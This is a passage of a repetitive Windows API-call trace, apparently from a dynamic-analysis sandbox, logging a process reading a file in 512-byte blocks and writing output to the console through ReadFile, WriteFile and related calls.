nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.949] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.959] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.959] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.960] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] GetFileType (hFile=0x50) returned 0x1 [0202.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.960] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.961] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.961] GetFileType (hFile=0x50) returned 0x1 [0202.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] GetFileType (hFile=0x50) returned 0x1 [0202.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.962] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.962] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] GetFileType (hFile=0x50) returned 0x1 [0202.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.963] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.964] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] GetFileType (hFile=0x50) returned 0x1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.964] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.965] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.965] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.966] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] GetFileType (hFile=0x50) returned 0x1 [0202.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.966] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.967] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType 